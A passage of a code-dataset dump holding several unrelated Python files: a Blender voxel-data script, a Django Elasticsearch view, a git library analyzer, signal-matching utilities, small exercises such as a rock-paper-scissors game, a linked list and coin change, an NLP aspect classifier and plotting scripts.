resol[3];\n#\tint interp_type;\n#\tshort file_format;\n#\tshort flag;\n#\tshort extend;\n#\tshort smoked_type;\n#\tshort hair_type;\n#\tshort data_type;\n#\tint _pad;\n#\t\n#\tstruct Object *object; /* for rendering smoke sims */\n#\tfloat int_multiplier;\n#\tint still_frame;\n#\tchar source_path[1024]; /* 1024 = FILE_MAX */\n#\n#\t/* temporary data */\n#\tfloat *dataset;\n#\tint cachedframe;\n#\tint ok;\n#\t\n#} VoxelData;\n\n#import ctypes\nfrom ctypes import *\nimport ctypes\nimport numpy as np\nfrom science import setMaterial\nimport bpy\n\n\nfilevoxout = '/Users/jillnaiman1/Desktop/test1_ytl4_l1en27.bvox'\n\n#Object = bpy.data.objects['Cube']\n\n# done by hand:\n# resol = 512, 512, 512\n# interp_type = 1\n# file_format = 0\n# flag = 0\n# extend = 2\n# hair_type = 0\n# data_type = 0\n# _pad = 0\n# Object = Nothing\n# int_multiplier = 1.0\n# still_frame = 0\n# source_path = b'/Users/jillnaiman1/Desktop/test1_ytl4_l1en27.bvox'\n# dataset = <__main__.LP_c_float object at 0x11dea31e0>\n# cachedframe = 0\n# ok = 1\n\n\n# with code\n# cachedframe = -1\n# ok = 0\n# source_path = b''\n\n\nclass VoxelData(Structure):\n _fields_ = [(\"resol\", c_int*3), # NOTE this really is supposed to be 3 numbers\n (\"interp_type\", c_int),\n (\"file_format\", c_short),\n (\"flag\", c_short),\n (\"extend\", c_short),\n (\"hair_type\", c_short),\n (\"data_type\", c_short),\n (\"_pad\", c_int),\n (\"Object\", c_voidp),\n (\"int_multiplier\", c_float),\n (\"still_frame\", c_int),\n (\"source_path\", c_char*1024), # this is probably wrong\n (\"dataset\", POINTER(c_float)),\n (\"cachedframe\", c_int),\n (\"ok\", c_int)]\n # NOTE!!! what to do about *dataset???\n\n\n\nmat_name = 'CubeMat'\ntex_name = 'CubeTex'\n\n# first create but if it does exist\nflagg = True\n# do we have cube?\nfor ob in bpy.data.objects:\n if ob.name == 'Cube':\n flagg = False\n\nif flagg:\n bpy.ops.mesh.primitive_cube_add(radius=1.0)\n\n\n# put it in the center \nbpy.data.objects['Cube'].location = (0,0,0.)\n\n\n# make a material\nmat = bpy.data.materials.new(mat_name)\nmat.type = 'VOLUME'\nmat.volume.density = 0.0 # lower?\nmat.volume.density_scale = 2.0 # upper in the slice plot\nmat.volume.scattering = 1.4\nmat.volume.emission = 0.0\nmat.transparency_method = 'Z_TRANSPARENCY'\n\nsetMaterial(bpy.data.objects['Cube'], mat)\n\n# Create texture from image sequence\nmtex = mat.texture_slots.add()\nmat.active_texture_index = 0\n\n# this should work but it doesnt right now...\ntex = bpy.data.textures.new(tex_name, type = 'VOXEL_DATA')\nmat.active_texture = tex\n\ntex.use_color_ramp = True\n\ntex.voxel_data.file_format = 'BLENDER_VOXEL'\n#tex.voxel_data.file_format = 'BLENDER_VOXEL'\n\ntex.voxel_data.filepath = filevoxout\n\nmat.texture_slots[0].texture_coords = 'ORCO' # generated coords\nmat.texture_slots[0].mapping = 'CUBE' # map to a cube\n\n# NO idea\nts = mat.texture_slots[0]\nts.use_map_density = True\nts.density_factor = 1.0\nts.use_map_emission = True\nts.emission_factor = 1.0\nts.use_map_color_emission = True\nts.emission_color_factor = 1.0\n\n\n\n \n\nfor i in range(3):\n tex.voxel_data.resolution[i] = 512\n\n\n\n\nvdp = ctypes.cast(bpy.data.textures[tex_name].voxel_data.as_pointer(),ctypes.POINTER(VoxelData))\n\nimport yt\nds = yt.load(\"~/data/IsolatedGalaxy/galaxy0030/galaxy0030\")\ncg = ds.covering_grid(4, [0,0,0], (512,512,512))\nrho = np.log10(cg[\"density\"])\nrho = (rho-rho.min())/(rho.max()-rho.min())\nrho = rho.astype(\"float32\").copy()\nrho = np.ascontiguousarray(rho)\narr = (ctypes.c_float * rho.size)()\narr2 = np.ctypeslib.as_array(arr, rho.shape)\narr2[:] = rho.flat[:]\n\nvdp.contents.dataset = ctypes.cast(arr, ctypes.POINTER(ctypes.c_float))\nvdp.contents.ok = 1\nvdp.contents.cachedframe = bpy.context.scene.frame_current\n\nprint (rho.strides)\n","sub_path":"exampleScripts/voxeldata.py","file_name":"voxeldata.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161258790","text":"from django.db.models.lookups import Lookup\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django_elasticsearch_dsl_drf.constants import ( LOOKUP_FILTER_GEO_DISTANCE,)\n\nfrom django_elasticsearch_dsl_drf.filter_backends import (FilteringFilterBackend, OrderingFilterBackend,CompoundSearchFilterBackend,)\nfrom django_elasticsearch_dsl_drf.viewsets import DocumentViewSet\n\n# Example app models\nfrom elasticapp.documents import PublisherDocument\nfrom elasticapp.serializers import PublisherDocumentSerializer\n\nclass PublisherDocumentView(DocumentViewSet):\n document=PublisherDocument\n serializer_class=PublisherDocumentSerializer\n lookup_field='id'\n filter_backends=[\n FilteringFilterBackend,\n OrderingFilterBackend,\n CompoundSearchFilterBackend\n\n ]\n\n search_fields=(\n 'name',\n 'address',\n 'city',\n 'state_province'\n 'country'\n )\n\n filter_fields={\n 'id': None,\n 'name': 'name.raw',\n 'city': 'city.raw',\n 'state_province': 'state_province.raw',\n 'country': 'country.raw',\n }\n\n ordering_fields = {\n 'id': None,\n 'name': None,\n 'city': None,\n 'country': None,\n }\n\n # Specify default ordering\n ordering = ('id', 'name',)\n # Define geo-spatial filtering fields\n geo_spatial_filter_fields = {\n 'location': {\n 'lookups': [\n LOOKUP_FILTER_GEO_DISTANCE,\n ],\n },\n }","sub_path":"elasticapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556583423","text":"import pathlib\nimport os\nimport hashlib as md5\nimport tempfile\nimport shutil\nimport git\nimport stat\nimport uuid\nfrom ui.progress import progress\nfrom language.loader import load as load_language\nfrom language.detect_language import supported_languages\nfrom datetime import datetime\nimport logging\nimport fnmatch\nimport time\n\nmodule_logger = logging.getLogger(\"main.analyze_libraries\")\n\n\nclass AnalyzeLibraries:\n def __init__(self, commit_list, author_emails, basedir, skip, commit_size_limit, file_size_limit, headless=False):\n self.commit_list = commit_list\n self.author_emails = author_emails\n self.basedir = basedir\n self.skip = skip\n self.commit_size_limit = commit_size_limit\n self.file_size_limit = file_size_limit\n self.headless = headless\n\n # Return a dict of commit -> language -> list of libraries\n def get_libraries(self):\n\n res = {}\n commits = _filter_commits_by_author_emails(self.commit_list, self.author_emails)\n if not commits:\n _log_info(\"No commmits found for the authored by selected users\")\n return res\n\n # If we are in headless mode, we don't copy the repo to temp location\n if self.headless:\n tmp_repo_path = self.basedir\n repo = git.Repo(tmp_repo_path)\n else:\n # Before we do anything, copy the repo to a temporary location so that we don't mess with the original repo\n tmp_repo_path = _get_temp_repo_path()\n\n _log_info(\"Copying the repository to a temporary location, this can take a while...\")\n try:\n shutil.copytree(\"%s/.git\" % self.basedir,\n \"%s/.git\" % tmp_repo_path,\n symlinks=True)\n\n except shutil.Error as e:\n module_logger.debug(\"Shutil error messages: {}.\".format(str(e)))\n _log_info(\"Finished copying the repository to\", tmp_repo_path)\n\n # Initialise the next tmp directory as a repo and hard reset, just in case\n repo = git.Repo(tmp_repo_path)\n repo.git.clean('-fd')\n try:\n repo.git.checkout('master')\n except git.exc.GitCommandError as err:\n _log_info(\"Cannot checkout master on repository: \", err)\n\n try:\n repo.git.reset('--hard')\n except git.exc.GitCommandError as err:\n _log_info(\"Cannot reset repository: \", err)\n\n prog = 0\n total = len(commits)\n\n if not self.skip:\n _log_info(\"Skipping is set to False. All commits and files will be evaluated. This may take time.\")\n else:\n _log_info(\"Commit size limit is {} MB and file size limit is {} MB.\".format(\n self.commit_size_limit, self.file_size_limit))\n\n try:\n for commit in commits:\n start = time.time()\n module_logger.debug(\"Current commit hash is {}.\".format(commit.hash))\n libs_in_commit = {}\n files = [os.path.join(tmp_repo_path, x.file_name)\n for x in commit.changed_files]\n\n # if skip is not set to false in args, we may skip certain commits\n # Estimate the summed size of the changed files in the commit. If changed files sum more than 10 MB\n # or there are no changed files we recognize, we skip the commit (don't check out)\n est_size = _estimate_changed_file_size(files)\n module_logger.debug(\"Changed file list is {} MBs.\".format(est_size))\n module_logger.debug(\"Skip is set to {}.\".format(self.skip))\n if not self.skip or ((est_size < self.commit_size_limit) and _should_we_check_out(files)):\n\n module_logger.debug(\"Checking out and analyzing commit.\")\n co_start = time.time()\n try:\n repo.git.checkout(commit.hash, force=True)\n except Exception:\n continue\n co_end = time.time()\n module_logger.debug(\"Checking out took {0:.6f} seconds.\".format(co_end - co_start))\n\n else:\n module_logger.debug(\"Skipping commit.\")\n prog += 1\n progress(prog, total, 'Analyzing libraries')\n continue\n\n for lang_root, extensions in supported_languages.items():\n # we have extensions now, filter the list to only files with those extensions\n lang_files = list(filter(lambda x: (pathlib.Path(\n x).suffix[1:].lower() in extensions), files))\n if lang_files:\n module_logger.debug(\"Current language is {}, and extensions are{}\".format(lang_root,\n extensions))\n # if we go to this point, there were files modified in the language we support\n # check out the commit in our temporary branch\n\n # we need to filter again for files, that got deleted during the checkout\n # we also filter out tiles, which are larger than 2 MB to speed up the process\n if self.skip:\n filter_func = (lambda x: os.path.isfile(x) and os.stat(x).st_size\n < self.file_size_limit * (1024**2))\n else:\n filter_func = (lambda x: os.path.isfile(x))\n\n lang_files_filtered = list(filter(filter_func, lang_files))\n\n total_size = sum(os.stat(f).st_size for f in lang_files_filtered)\n module_logger.debug(\"The number of files in lang_files_filtered\"\n \" is {0}, the total size is {1:.2f} MB\".\n format(\n len(lang_files_filtered), total_size / (1024 ** 2)\n ))\n # now we need to run regex for imports for every single of such file\n # Load the language plugin that is responsible for parsing those files for libraries used\n parser = load_language(lang_root)\n # Only parse libraries if we support the current language\n if parser:\n mapped_libs = parser.extract_libraries(lang_files_filtered).items()\n for lang, libraries in mapped_libs:\n if len(libraries) == 0:\n continue\n if lang not in libs_in_commit.keys():\n libs_in_commit[lang] = []\n libs_in_commit[lang].extend(libraries)\n\n prog += 1\n end = time.time()\n module_logger.debug(\"Time spent processing commit {0} was {1:.4f} seconds.\".format(\n commit.hash, end-start))\n\n progress(prog, total, 'Analyzing libraries')\n\n if libs_in_commit:\n res[commit.hash] = libs_in_commit\n\n except (Exception, KeyboardInterrupt) as err:\n # make sure to clean up the tmp folder before dying\n # if we are in headless mode, it is not necessary to cleanup,\n # the repo will be deleted later\n if not self.headless:\n _cleanup(tmp_repo_path)\n\n raise err\n\n if not self.headless:\n _cleanup(tmp_repo_path)\n\n return res\n\n\ndef _should_we_check_out(file_list):\n\n for lang, extensions in supported_languages.items():\n lang_files = list(filter(lambda x: (pathlib.Path(x).suffix[1:].lower() in extensions), file_list))\n if lang_files:\n return True\n return False\n\n\ndef _estimate_changed_file_size(file_list):\n total_size = 0\n for file in file_list:\n try:\n total_size += os.stat(file).st_size / (1024**2)\n except (FileNotFoundError, Exception) as e:\n module_logger.debug(\"Error when getting file size {}\".format(str(e)))\n continue\n return total_size\n\n\ndef _remove_readonly(func, path, _):\n\n \"\"\"Clear the readonly bit and reattempt the removal\"\"\"\n os.chmod(path, stat.S_IWRITE)\n func(path)\n\n\ndef _cleanup(tmp_repo_path):\n _log_info(\"Deleting\", tmp_repo_path)\n try:\n shutil.rmtree(tmp_repo_path, onerror=_remove_readonly)\n except (PermissionError, NotADirectoryError, Exception) as e:\n _log_info(\"Error when deleting {}\".format(str(e)))\n\n\n# Return only commits authored by provided obfuscated_author_emails\ndef _filter_commits_by_author_emails(commit_list, author_emails):\n _log_info(\"Filtering commits by emails: \", author_emails)\n return list(filter(lambda x: x.author_email in author_emails, commit_list))\n\n\ndef _get_temp_repo_path():\n return os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))\n\n\ndef _log_info(message, *argv):\n timed_message = \"[%s] %s\" % (datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"), message)\n print(timed_message, *argv)\n","sub_path":"src/analyze_libraries.py","file_name":"analyze_libraries.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"471398482","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nfrom sklearn.metrics import mean_squared_error\nfrom scipy.signal import find_peaks\nfrom scipy.spatial.distance import euclidean\n#import fastdtw\n#from dtaidistance import dtw\n\n\n# %% some normalization functions\ndef normalized_rms(y, y_hat):\n v_y = np.var(y)\n if v_y == 0:\n v_y = 1\n norm_res = np.sqrt(mean_squared_error(y, y_hat) / v_y)\n return norm_res\n\n\ndef center(x: np.ndarray):\n y = x - np.mean(x)\n return y\n\n\ndef center_scale(x: np.ndarray):\n xc = center(x)\n x_std = np.std(xc, ddof=1)\n if x_std == 0 or np.isnan(x_std):\n x_std = 1\n\n x_cs = xc / x_std\n return x_cs\n\n\ndef normalize_range(x: np.ndarray, new_min: float = 0.0, new_max: float = 1.0):\n x_min = np.min(x)\n x_max = np.max(x)\n d = x_max - x_min\n\n if d == 0:\n d = 1\n\n xn = new_min + (x-x_min)/d * (new_max-new_min)\n\n return xn\n\n\n# %% similarity measures\ndef pearson_correlation_coefficient(x: np.ndarray, y: np.ndarray):\n x_cs = center_scale(x)\n y_cs = center_scale(y)\n c = np.dot(x_cs, y_cs) / len(x_cs)\n\n return c\n\n\ndef pearson_center(x: np.ndarray, y: np.ndarray):\n x_cs = center(x)\n y_cs = center(y)\n c = np.dot(x_cs, y_cs) / len(x_cs)\n\n return c\n\n\n\ndef normalized_euclidean_distance(x, y):\n d = np.linalg.norm(x - y)\n xn = np.linalg.norm(x)\n yn = np.linalg.norm(y)\n md = np.maximum(xn, yn)\n\n if md == 0.0:\n md = 1\n d /= md\n\n return d\n\n\ndef distance_by_dynamic_time_warping(x, y):\n distance, path = fastdtw.fastdtw(x, y, dist=euclidean)\n\n return distance, path\n\n\ndef distance_by_dynamic_time_warping2(x, y):\n distance = dtw.distance_fast(x, y)\n return distance\n\n\n# %%\ndef subtract_polynomial_model(y: np.ndarray, degree: int = 1):\n \"\"\"\n example:\n M = 100\n mu, sigma = 1, 0.3\n x = np.linspace(0, 1, M)\n y = np.random.normal(mu, sigma, M)\n degree = 2\n y_hat = subtract_polynomial_model(y, degree=degree)\n plt.scatter(x, y, color='navy', s=30, marker='o', label=\"data points\")\n plt.plot(x, y_hat, color='red', linewidth=2, label=\"degree %d\" % degree)\n plt.grid()\n plt.show()\n \"\"\"\n m = len(y)\n x = np.linspace(-1.0, 1.0, m)\n c = np.polyfit(x, y, degree)\n p1 = np.poly1d(c)\n y_hat = p1(x)\n r = y - y_hat\n return r, y_hat\n\n\n# %%\ndef template_matching_1d(template: np.ndarray, y: np.ndarray, sim_method: str = 'pearson',\n preprocesssing_method: str = 'no', normalize: bool = True):\n m = len(template)\n n = len(y)\n c = np.zeros((n,))\n for i in np.arange(0, n):\n x1 = i\n x2 = np.minimum(i + m, n)\n yi = y[x1:x2]\n t = template[:(x2-x1)]\n\n if len(t) > 5:\n if preprocesssing_method == 'subtract_quad':\n t, _ = subtract_polynomial_model(t, degree=2)\n yi, _ = subtract_polynomial_model(yi, degree=2)\n\n if preprocesssing_method == 'subtract_gradient':\n t, _ = subtract_polynomial_model(t, degree=1)\n yi, _ = subtract_polynomial_model(yi, degree=1)\n\n if preprocesssing_method == 'subtract_kub':\n t, _ = subtract_polynomial_model(t, degree=3)\n yi, _ = subtract_polynomial_model(yi, degree=3)\n\n\n if sim_method == 'pearson':\n pc = pearson_correlation_coefficient(t, yi)\n c[i] = pc\n\n if sim_method == 'conv':\n c[i] = np.abs(np.dot(t, yi))\n\n if sim_method == 'euclidean':\n nd = 1.0 - normalized_euclidean_distance(t, yi)\n c[i] = nd # np.maximum(np.minimum(1.0, nd), 0.0)\n\n if sim_method == 'dtw':\n d, _ = distance_by_dynamic_time_warping(t, yi)\n c[i] = 1.0 - d\n\n if sim_method == 'dtw2':\n d = distance_by_dynamic_time_warping2(t, yi)\n c[i] = 1.0 - d\n\n if normalize:\n c = normalize_range(c)\n\n return c\n\n\n# %%\n\ndef detect_peaks(y: np.ndarray, min_level: float = 0.8, max_level: float = 1.01, min_dist: int = 10):\n #peaks, _ = find_peaks(y, height=(min_level, max_level), distance=min_dist)\n\n peaks, _ = find_peaks(y, height=min_level, distance=min_dist)\n #print(\"detect peaks\",_)\n return peaks\n","sub_path":"plugins/mininghelper.py","file_name":"mininghelper.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"62120119","text":"from random import randint\n\n\"\"\"\nPEDRA x PAPEL : PAPEL\nPEDRA x TESOURA : PEDRA\n\nPAPEL x PEDRA : PAPEL\nPAPEL x TESOURA : TESOURA\n\nTESOURA x PEDRA : PEDRA\nTESOURA x PAPEL : TESOURA\n\"\"\"\n\ndef msgVence(op, jogador):\n\tprint(op + \"\\n\" + jogador + \" vence!\")\n\nlis = ('PEDRA', 'PAPEL', 'TESOURA')\n\nprint('''Escolha\n[0]: PEDRA\n[1]: PAPEL\n[2]: TESOURA''')\n# print()\nop1 = int(input('Escolher: ')) % 3\njogador1 = lis[op1]\n\nop2 = randint(0, 2)\nif op1 == op2:\n\top2 += 1\n\top2 %= 3\n\ncomputador = lis[op2]\n\nprint('\\n{} x {} : '.format(jogador1, computador), end='')\n\nif computador == 'PEDRA':\n\tif jogador1 == 'PAPEL':\n\t\tmsgVence(\"PAPEL\", \"jogador1\")\n\telse:\n\t\tmsgVence(\"PEDRA\", \"computador\")\nelif computador == \"PAPEL\":\n\tif jogador1 == 'PEDRA':\n\t\tmsgVence(\"PAPEL\", \"computador\")\n\telse:\n\t\tmsgVence(\"TESOURA\", \"jogador1\")\nelif jogador1 == \"PEDRA\":\n\tmsgVence(\"PEDRA\", \"jogador1\")\nelse:\n\tmsgVence(\"TESOURA\", \"computador\")\n\n\ninput()","sub_path":"curso-em-video/mundo2/tupla.py","file_name":"tupla.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"204408967","text":"class Node:\n def __init__(self):\n self.data = None\n self.next = None\n\nclass CircularLinkedList:\n def __init__(self):\n self.tail = None\n self.cur = None\n self.before = None\n self.numOfData = 0\n \n def LInsert(self, data):\n newNode = Node()\n newNode.data = data\n\n if self.tail is None:\n self.tail = newNode\n newNode.next = newNode\n else:\n newNode.next = self.tail.next\n self.tail.next = newNode\n self.tail = newNode\n self.numOfData += 1\n \n def LInsertFront(self, data):\n newNode = Node()\n newNode.data = data\n\n if self.tail is None:\n self.tail = newNode\n newNode.next = newNode\n else:\n newNode.next = self.tail.next\n self.tail.next = newNode\n self.numOfData += 1\n \n def LFirst(self):\n if self.tail is None:\n return False, -1\n \n self.before = self.tail\n self.cur = self.tail.next\n\n return True, self.cur.data\n \n def LNext(self):\n if self.tail is None:\n return False, -1\n \n self.before = self.cur\n self.cur = self.cur.next\n\n return True, self.cur.data\n \n def LRemove(self):\n rpos = Node()\n rdata = rpos.data\n\n if rpos == self.tail:\n if self.tail == self.tail.next:\n self.tail = None\n else:\n self.tail = self.before\n \n self.before.next = self.cur.next\n self.cur = self.before\n\n self.numOfData -= 1\n return rdata\n \n def LCount(self):\n return self.numOfData\n","sub_path":"codes/Question5_1/Python/CircularLinkedListModule.py","file_name":"CircularLinkedListModule.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"638783982","text":"# Uses python3\nimport sys\n\ndef get_change(m):\n #write your code here\n change = 0\n if m < 10 and m < 5:\n return (m)\n elif m < 10 and m > 5:\n mid = m%5\n return (1+mid)\n else:\n ten_coin = m//10\n mid = m%10\n if mid < 5:\n return (ten_coin+mid)\n else:\n return (ten_coin+mid-4)\n\n\n\n\n\nif __name__ == '__main__':\n m = int(input())\n print(get_change(m))\n","sub_path":"week3_greedy_algorithms/1_money_change/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"629624042","text":"# importing nltk libraries\nimport gensim.models\nimport src\nfrom nltk.tokenize import word_tokenize\nfrom aspect_sentiment_analyzer.chunklib import BigramChunker\nfrom nltk.corpus import conll2000\nfrom nltk.tag import pos_tag\nfrom nltk.tokenize import sent_tokenize\nimport pickle\nfrom gensim import utils, matutils\nfrom numpy import dot\nfrom word2vec_model.cluster_words import Kmean_cluster_tagging\nfrom word2vec_model.cluster_words import Kmean_cluster_food_tagging\n\nclass context_aspect_linker():\n\n def __init__(self):\n print('loading word2vec model')\n self.model = gensim.models.Word2Vec.load(src.RA + '/data/models/model_updatable_unigram.p')\n print('word2vec model loaded')\n with open(src.RA + '/data/models/aspect_cluster_centers_new.p','rb') as f:\n self.aspect_category_center_mapping = pickle.load(f)\n\n self.aspect_category_center_mapping['food_category'].append(self.model['food'])\n self.aspect_category_center_mapping['service_category'].append(self.model['service'])\n self.aspect_category_center_mapping['misc_category'].append(self.model['quantity'])\n self.food_list ,self.ambience_list,self.cost_list,self.service_list= pickle.load(open(src.RA + \"/data/models/aspects_cluster_centers.p\",\"rb\"))\n self.food_list.append(self.model['food'])\n self.ambience_list.append(self.model['ambience'])\n self.cost_list.append(self.model['cost'])\n self.service_list.append(self.model['service'])\n self.food_entity, self.non_food_list = pickle.load(open(src.RA + \"/data/models/food_classifier_model.p\",\"rb\"))\n\n\n def context_split(self,sentence):\n words = word_tokenize(sentence.lower())\n tagged_words = pos_tag(words)\n sentence_length = len(words)\n similarity_list = []\n index_list_tagged = []\n context_tagged = []\n max = 0\n for word in words:\n try:\n print(word,self.model.similarity('but',word))\n similarity = self.model.similarity('but',word)\n similarity_list.append(similarity)\n if max < similarity:\n max = similarity\n except Exception as e:\n similarity_list.append(0)\n #normalised_list = similarity_list/max\n for i in range (len(words)):\n if tagged_words[i][1] == 'CC':\n index_list_tagged.append(i)\n index_list_tagged.append(sentence_length)\n var = 0\n for index in index_list_tagged:\n context_tagged.append(words[var:index])\n var = index + 1\n\n def get_maximum_similarity(self, word, aspect_list):\n max_similarity = 0\n for centre in aspect_list:\n similarity = dot(matutils.unitvec(self.model[word]), matutils.unitvec(centre))\n if max_similarity < similarity:\n max_similarity = similarity\n return max_similarity\n\n def test_aspect(self, test):\n # print(test)\n similarity_sum_food = 0\n similarity_sum_cost = 0\n similarity_sum_ambience = 0\n similarity_sum_service = 0\n for word in test:\n # print(word)\n try:\n similarity_sum_food += self.get_maximum_similarity(word, self.food_list)\n similarity_sum_ambience += self.get_maximum_similarity(word, self.ambience_list)\n similarity_sum_service += self.get_maximum_similarity(word, self.service_list)\n similarity_sum_cost += self.get_maximum_similarity(word, self.cost_list)\n except Exception as e:\n # print(e)\n pass\n # print('food :', similarity_sum_food)\n # print('ambience :', similarity_sum_ambience)\n # print('cost :', similarity_sum_cost)\n # print('service :', similarity_sum_service)\n aspect_list = [similarity_sum_ambience, similarity_sum_service, similarity_sum_cost, similarity_sum_food]\n tag_list = ['ambience', 'service', 'cost', 'food']\n tag_index = aspect_list.index(max(aspect_list))\n return tag_list[tag_index]\n\n def get_multiple_aspect_categories(self,noun_phrases):\n word_aspect_category = {}\n for words in noun_phrases:\n if len(words)>0:\n temp={}\n for word in words:\n # print(word)\n temp={}\n try:\n temp['food_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['food_category'])\n temp['ambience_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['ambience_category'])\n temp['service_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['service_category'])\n temp['cost_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['cost_category'])\n temp['drinks_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['drinks_category'])\n temp['misc_category'] = self.get_maximum_similarity(word, self.aspect_category_center_mapping['misc_category'])\n category = max(temp,key=temp.get)\n word_aspect_category[word]=category\n except Exception as e:\n pass\n # print(e)\n return word_aspect_category\n\n def get_multiple_tags(self, noun_phrases):\n words = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n for j in range(len(phrase)):\n words.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.get_multiple_aspect_categories(noun_phrases)\n return tag, words\n\n def get_tag(self, noun_phrases):\n try:\n words = []\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n for j in range(len(phrase)):\n words.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.test_aspect(words)\n return tag, words\n\n def get_phrase_tag(self, noun_phrases):\n phrase_tag = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n words = []\n for j in range(len(phrase)):\n words.append(noun_phrases[i][j])\n tag = self.get_tag(words)\n if tag == 'food':\n #print(phrase)\n self.food_entities.append([phrase])\n except Exception as e:\n pass\n\n def get_aspect_count(self, noun_phrases):\n aspect_count = 0\n aspect_list = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n word = []\n try:\n for j in range(len(phrase)):\n word.append(noun_phrases[i][j])\n except Exception as e:\n pass\n tag = self.test_aspect(word)\n aspect_list.append(tag)\n except Exception as e:\n pass\n # print(aspect_list)\n return aspect_list\n\n def create_aspects(self):\n aspects,model = Kmean_cluster_tagging(100)\n pickle.dump(model,open(\"kmeans_cluster_model.p\",\"wb\"))\n pickle.dump(aspects,open(\"aspects_cluster_centers.p\",\"wb\"))\n print(\"Kmeans cluster model and aspect cluster centers model saved locally\")\n\n def create_food_clusters(self):\n food_classifier_model,model = Kmean_cluster_food_tagging(200)\n pickle.dump(model,open(\"kmeans_cluster_model_200.p\",\"wb\"))\n pickle.dump(food_classifier_model,open(\"food_classifier_model.p\",\"wb\"))\n print(\"Kmeans cluster model and aspect cluster centers model saved locally\")\n\n def get_food_list(self, noun_phrases):\n food_list_entity = []\n try:\n for i in range(len(noun_phrases)):\n phrase = noun_phrases[i]\n # print('phrase :',phrase)\n food_similarity = 0\n food_dissimilarity = 0\n food = []\n try:\n for j in range(len(phrase)):\n word = noun_phrases[i][j]\n food_similarity = food_similarity + self.get_maximum_similarity(word, self.food_entity)\n food_dissimilarity = food_dissimilarity + self.get_maximum_similarity(word, self.non_food_list)\n if food_similarity > food_dissimilarity:\n food.append(word)\n except Exception as e:\n pass\n if len(food) != 0:\n food_list_entity.append(food)\n # print('food = ', food)\n except Exception as e:\n pass\n # print(food_list)\n return food_list_entity\n\n\n\nif __name__==\"__main__\":\n analyser = context_aspect_linker()\n sentence = ' '\n while(sentence != 'end'):\n sentence = input('Enter the sentence: \\n')\n print(analyser.test_aspect(word_tokenize(sentence)))\n a = context_aspect_linker()\n print(a.get_food_list([['paneer tikia']]))\n\n\n\n\n","sub_path":"src/main/python/aspect_sentiment_analyzer/aspect_classifier.py","file_name":"aspect_classifier.py","file_ext":"py","file_size_in_byte":9427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468528452","text":"import numpy as np\nimport sys\nsys.path.append('../../../plots/scripts')\nfrom plotClass import plotCLASS\nfrom plotParams import pltParams\n\nparams = pltParams()\n\nplc = plotCLASS()\n\n\nqBins = [85,87,88,90]\n\nruns = [\"20180627_1551\", \"20180629_1630\"] #, \"20180630_1925\", \"20180701_0746\"]\ntimeSteps = [29, 18, 19, 19]\n\nQ = np.arange(params.NradAzmBins)*params.QrangeAzm[1]/params.NradAzmBins\n\noptsDiff = {\n \"xLim\" : [-0.25, 1.1],\n \"xTitle\" : r\"time [ps]\", \n }\noptsCorr = {\n \"yLim\" : [-0.2, 0.15],\n \"xTitle\" : r\"R [$\\AA$]\", \n #\"smooth\" : 7 \n }\n\n\"\"\"\noptsDiff[\"labels\"] = []\noptsCorr[\"labels\"] = []\nfor iq in qBins:\n optsDiff[\"labels\"].append(str(iq*0.0223) + r\" $\\AA^{-1}$\")\n optsCorr[\"labels\"].append(str(iq*0.0223) + r\" $\\AA^{-1}$\")\n \"\"\"\n\nfor i,run in enumerate(runs):\n\n print(\"run\", run)\n times = np.fromfile(\"../../../mergeScans/results/timeDelays[\"\n + str(timeSteps[i] + 1) + \"].dat\", np.double)\n times = times[:-1]\n\n if run is \"20180627_1551\":\n optsDiff[\"yLim\"] = [-0.009, 0.008]\n elif run is \"20180629_1630\":\n optsDiff[\"yLim\"] = [-0.003, 0.007]\n\n fileName = params.mergeResultFolder\\\n + \"/data-\" + run + \"-azmAvgDiff\"\\\n + \"[\" + str(timeSteps[i]) + \",\" + str(params.NradAzmBins) + \"].dat\"\n plc.printLineOut(fileName, 1, qBins, \"../data-\" + run + \"-timeLO\", \n X=times, options=optsDiff)\n\n \"\"\"\n fileName = \"../../results/data-\"\\\n + run + \"-pairCorrOdd[\"\\\n + str(timeSteps[i]) + \",\" + str(params.NpairCorrBins) + \"].dat\"\n plc.printLineOut(fileName, 0, timeInds, \"../data-\" + run + \"-pairCorrLO\", \n xRange=params.Rrange, options=optsCorr)\n \"\"\"\n","sub_path":"UED/timeDepStudies/plots/scripts/plotTimeOuts.py","file_name":"plotTimeOuts.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112256806","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport numpy as 